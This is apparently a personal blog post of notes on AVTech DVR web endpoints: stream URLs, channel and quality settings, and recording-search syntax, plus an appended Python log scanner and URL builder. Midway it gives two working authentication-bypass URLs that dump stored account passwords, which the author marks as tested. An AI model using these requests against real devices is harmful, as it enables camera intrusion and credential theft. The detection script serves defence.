MYCSS

December 29, 2018

AVTECH DVR HIDDEN COMMANDS

I wanted to jot down some notes for myself on how to connect to an AVTech DVR.
It turned out to be a bit more than that.
The main goal is still to find out how to receive an event notification from the DVR and then read the corresponding fragment of the recording, without using the vendor's own software.

URLS:

Viewing with VLC player, without sound:
rtsp://DVR_URL/live/mpeg4
rtsp://DVR_URL/live/h264

Viewing with sound:
rtsp://DVR_URL/live/mpeg4_ulaw
rtsp://DVR_URL/live/h264_ulaw


By channel:
rtsp://DVR_URL/live/h264/ch0 - MAIN
rtsp://DVR_URL/live/h264/ch1 .. ch8 - individual channels

C# Camera SDK: How to connect to your AVTECH IP camera
Single image:
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=CIF 
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=4CIF 
MJPEG sequence:
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=MJPEG

INFORMATION:

FOR ALL : http://DVR_URL/cgi-bin/nobody/Machine.cgi?action=get_capability

MOBILE VIEW:

http://DVR_URL/nobody/mobile480.htm?Login=Captcha - main view
http://DVR_URL/nobody/m2.htm?ch=1&rf=3&dep=1  - ch1

Change main view ch:

http://DVR_URL/cgi-bin/user/Serial.cgi?action=write&device=MASTER&data=02 3C 00 00 23&sid=0.22579487226719663 - ch6

data=02 3E 00 00 23 - ch8
data=02 3D 00 00 23 - ch7
data=02 3C 00 00 23 - ch6
data=02 3B 00 00 23 - ch5
data=02 3A 00 00 23 - ch4
data=02 39 00 00 23 - ch3
data=02 38 00 00 23 - ch2
data=02 37 00 00 23 - ch1

data=02 1A 00 00 23 - cut1-4 and next cut4-8
data=02 19 00 00 23 - cut9

Change Resolution and Quality

From DOC:
http://DVR_URL/cgi-bin/nobody/Machine.cgi?action=get_capability

0
OK
Firmware.Version=1133-1039-1013-1025-0a-0000
MACAddress=00:0X:XX:XX:XX:XX
Product.Type=DVR
Product.ID=672
Product.ShortName=None
Video.System=PAL
Video.Input.Num=4
Video.Output.Num=1
Video.Format=H264,MJPEG
Video.Format.Default=H264
Video.Resolution=4CIF,CIF
Video.Quality=BEST,HIGH,NORMAL,BASIC
Video.Local.Input.Num=4
Video.Local.Output.Num=1
Video.Local.Format=H264,MJPEG
Audio.Input.Num=0
Audio.Output.Num=0
Audio.Format=ULAW
Audio.Local.Input.Num=1
Audio.Local.Output.Num=1
Audio.Local.Format=PCM
Language.Default=ENGLISH
Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&CUSTOMIZE&THAI&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN&
Capability=0,0,0,0

Set parameters Quality=BEST, Resolution=4CIF:
http://DVR_URL/cgi-bin/user/Config.cgi?action=set&Video.I0.H264.Quality=BEST&Video.I0.H264.Resolution=4CIF&rnd=0.1511

And here I found information about bugs that were never fixed in the firmware.


AVTECH EXPLOITS: https://www.exploit-db.com/exploits/40500

GET USERS PASSWORD!!!! :
http://DVR_URL/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
http://DVR_URL/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*


TESTED !!!! WORKS, CRAZY


https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities
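
A log check for the two request shapes listed above, as an added example (not from the original post or the advisory): it flags requests to a CGI directory other than /cgi-bin/nobody/ whose query string carries `.cab` or `/nobody`. The log lines are constructed, the function names are hypothetical, and treating /cgi-bin/nobody/ as the only unauthenticated CGI directory is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote

# Markers that appear in the query strings of the two URLs listed on this page.
MARKERS = (".cab", "/nobody")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample: access log of a reverse proxy placed in front of the DVR.
SAMPLE_LOG = """\
192.0.2.10 - - [29/Dec/2018:10:00:01 +0200] "GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1" 200 612
192.0.2.10 - admin [29/Dec/2018:10:00:05 +0200] "GET /cgi-bin/user/Config.cgi?action=set&Video.I0.H264.Quality=BEST HTTP/1.1" 200 9
198.51.100.7 - - [29/Dec/2018:10:02:11 +0200] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1" 200 431
198.51.100.7 - - [29/Dec/2018:10:02:12 +0200] "GET /cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.* HTTP/1.1" 200 431
"""


def is_suspicious(target: str) -> bool:
    """True when a request to a login-protected CGI carries one of the markers."""
    parts = urlsplit(target)
    # Normalise percent-encoding and case before matching.
    path = unquote(parts.path).lower()
    query = unquote(parts.query).lower()
    if not path.startswith("/cgi-bin/"):
        return False
    if path.startswith("/cgi-bin/nobody/"):
        return False  # assumption: this directory needs no login anyway
    return any(marker in query for marker in MARKERS)


def scan(log_text: str) -> list:
    """Return (client address, request target) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append((line.split()[0], match.group(1)))
    return hits


if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(f"ALERT {client} {target}")
```

A hit that was answered with status 200 and no authenticated user in the log entry is the case to investigate first.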


Status

By some CGI Tutorials:
Request: (GET|POST)
URL: http://DVR_URL/cgi-bin/guest/SmartMonitor.cgi
Result:
0
OK
SmartMonitor=Alive
Request: (POST)
URL: http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi
Parameter

Result:

Syntax:



http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&hdd_num=<hdd_num_value>&channel=<channel_value>&start_time=<start_time>&end_time=<end_time>
where format of start_time=2007 05 28 16 00 10 , end_time=2007 05 28 16 10 59

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&type=<type_parameter>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&type=<type_parameter>&command=<command_parameter>&hdd_num=<hdd_num_value>&list_num=<list_num_value>&list_type=<list_type_parameter>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&hdd_num=<hdd_num_value>&start_time=<start_time>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&channel=<channel_value>&hdd_num=<hdd_num_value>&event=<event_parameter>&start_time=<start_time>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&command=<command_parameter>
where
<action_parameter> : download, query, playback, event_search, time_search, retr
<type_parameter> : hdd, search_list, dependent
<command_parameter> : forward, backward, latest, on, off
<list_type_parameter> : ALL, MANUAL, SYSTEM, ALARM, MOTION
<event_parameter> : alarm, motion
<hdd_num_value> : 1, 2, 3, …
<channel_value> : 1, 2, 3, …
<list_num_value> : 100

Example:
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=retr&command=on)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=event_search&channel=1&hdd_num=1&event=alarm&start_time=2007 10 16 13 00 00)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=time_search&hdd_num=1&start_time=2007 10 16 13 00 00)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=download&num=1&channel=1&start_time=2007 05 28 16 00 10&end_time=2007 05 28 16 10 59)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=query&type=search_list&command=latest&hdd_num=1&list_num=100&list_type=ALL)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=query&type=hdd)
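
A small builder for the NetworkBk.cgi requests described above, as an added example that is not part of the original notes: it accepts only the parameter names and values listed on this page, formats timestamps as `YYYY MM DD HH MM SS`, and percent-encodes the spaces the way a browser does for the raw URLs shown. The names `networkbk_url`, `dvr_time`, `ALLOWED` and `SAMPLE_START` are hypothetical.

```python
from datetime import datetime
from urllib.parse import urlencode, quote

# Allowed values, copied from the parameter list on this page.
ALLOWED = {
    "action": {"download", "query", "playback", "event_search", "time_search", "retr"},
    "type": {"hdd", "search_list", "dependent"},
    "command": {"forward", "backward", "latest", "on", "off"},
    "list_type": {"ALL", "MANUAL", "SYSTEM", "ALARM", "MOTION"},
    "event": {"alarm", "motion"},
}
NUMERIC = {"hdd_num", "channel", "list_num"}
TIMES = {"start_time", "end_time"}

# Sample timestamp, taken from the event_search example on this page.
SAMPLE_START = datetime(2007, 10, 16, 13, 0, 0)


def dvr_time(value: datetime) -> str:
    """Format a datetime the way the page shows it: '2007 05 28 16 00 10'."""
    return value.strftime("%Y %m %d %H %M %S")


def networkbk_url(base: str, **params) -> str:
    """Build a NetworkBk.cgi URL; reject anything outside the documented set."""
    if "action" not in params:
        raise ValueError("action is required")
    query = []
    for name, value in params.items():
        if name in ALLOWED:
            if value not in ALLOWED[name]:
                raise ValueError(f"{name}={value!r} is not a documented value")
        elif name in NUMERIC:
            if not isinstance(value, int) or value < 1:
                raise ValueError(f"{name} must be a positive integer")
        elif name in TIMES:
            value = dvr_time(value)
        else:
            raise ValueError(f"unknown parameter {name!r}")
        query.append((name, str(value)))
    # quote_via=quote encodes spaces as %20 instead of '+'.
    return f"{base}/cgi-bin/supervisor/NetworkBk.cgi?" + urlencode(query, quote_via=quote)


if __name__ == "__main__":
    print(networkbk_url("http://192.168.5.124:88", action="event_search",
                        channel=1, hdd_num=1, event="alarm", start_time=SAMPLE_START))
```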




